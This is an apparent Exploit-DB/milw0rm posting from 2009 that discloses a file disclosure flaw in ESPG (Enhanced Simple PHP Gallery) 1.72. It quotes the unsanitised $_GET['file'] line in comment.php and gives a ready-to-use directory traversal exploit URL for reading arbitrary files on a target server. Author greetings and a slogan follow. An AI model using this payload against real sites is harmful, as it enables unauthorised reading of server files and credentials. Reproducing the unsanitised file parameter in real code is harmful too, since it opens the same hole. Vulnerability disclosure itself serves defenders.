ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure

EDB-ID:

7819

Author:

bd0rk

Type:

webapps

Platform:

PHP

Published:

2009-01-18

                      .::ESPG 1.72 File Disclosure Vulnerability::.
 
 

 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

 => Vendor: http://quirm.net
 
 => Download: http://quirm.net/download/21/

 => Bugfounder: bd0rk

 => Contact: bd0rk[at]hackermail.com

 => Greetings: str0ke, TheJT, Maria, Alucard, x0r_32

 => Vulnerable Code in comment.php line 3

            -------------------------

             $fileid = $_GET['file'];

            -------------------------



[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

    
                     => 'GAINST WAR IN ISRAEL AND GAZA!!! <=

# milw0rm.com [2009-01-18]